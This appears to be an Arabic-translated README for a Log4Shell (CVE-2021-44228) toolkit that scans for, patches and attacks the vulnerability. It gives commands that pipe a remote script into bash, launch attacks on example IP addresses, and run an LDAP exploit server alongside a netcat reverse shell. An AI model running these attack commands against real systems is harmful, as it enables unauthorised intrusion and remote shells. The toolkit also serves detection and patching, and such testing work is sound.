
Log4shell - مجموعة أدوات متعددة. اكتشف، وأصلح، واختبر الثغرات المحتملة لـ CVE-2021-44228 - يوفر بيئة اختبار/هجوم كاملة لـ LOG4SHELL على الشل
Log4j - أداة متعددة الاستخدامات. ابحث عن ثغرات CVE-2021-44228 المحتملة وأصلحها - توفر بيئة اختبار/هجوم LOG4SHELL كاملة

apt update ; apt install default-jre screen python3-pip bash curlzypper ref ; zypper in default-jre screen python3-pip bash curlyum clean; yum install default-jre screen python3-pip bash curlpkg install default-jre screen python3-pip curl/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" ; brew install default-jre screen python3 pipwget https://raw.githubusercontent.com/suuhm/log4shell4shell/main/log4shell4shell.sh -qO- | bash -s -- --check-system
git clone https://github.com/suuhm/log4shell4shell ; cd log4shell4shell
mv log4shell4shell.sh l4s4s.sh && chmod +x l4s4s.sh
./l4s4s.sh --run-attack http://10.4.4.20:8080/login.php -e
شغّل screen -r l4s4s-ldap-srv و/أو screen -r l4s4s-nc-rsh لعرض بعض معلومات الهجوم في شل خادم الاستغلال:
./l4s4s.sh --python-scan "-u 10.4.4.20:8080 --run-all-tests"
./l4s4s.sh --run-dummy-server && \
./l4s4s.sh --run-attack http://127.0.0.1:4280 -e
./l4s4s.sh --run-attack 10.4.4.20:8443 -e --unifi-post
_| _| _| _| _| _| _| _| _| _| _|
_| _|_| _|_|_| _| _| _|_|_| _|_|_| _|_| _| _| _| _| _|_|_| _|_|_| _|_| _| _|
_| _| _| _| _| _|_|_|_| _|_| _| _| _|_|_|_| _| _| _|_|_|_| _|_| _| _| _|_|_|_| _| _|
_| _| _| _| _| _| _|_| _| _| _| _| _| _| _|_| _| _| _| _| _|
_|_|_|_| _|_| _|_|_| _| _|_|_| _| _| _|_|_| _| _| _| _|_|_| _| _| _|_|_| _| _|
_|
_|_|
> Running Log4shell Framework & Check-Toolkit on shell v0.1a (C) 2021 suuhm
Wrong input! Please enter one of these options:
Usage: ./l4s4s.sh [OPTIONS] <IP:PORT|COMMAND>
--get-powershell-finder
--check-system
--fix-log4j
--run-dummy-server <JNDIExploit.*.zip>
--run-attack <FORMAT: IP:PORT> <-e/-t/'cmd'> [--unifi-post]
--python-scan <command>
فقط قم بتشغيل السكريبت المساعد الخاص بي (--list-versions): ./python-upgrader.sh
فقط قم بتشغيله في Powershell (بصلاحية المسؤول): .\set_windows_fix.ps1
مشروع log4shell4shell أُنشئ لأغراض تعليمية واختبارات أخلاقية فقط. استخدام log4j-scan لمهاجمة أهداف دون موافقة مسبقة متبادلة غير قانوني. تقع مسؤولية الامتثال لجميع القوانين المحلية والولائية والفيدرالية المعمول بها على عاتق المستخدم النهائي. يخلي المطورون مسؤوليتهم ولا يتحملون أي مسؤولية عن أي إساءة استخدام أو ضرر ناجم عن هذا البرنامج.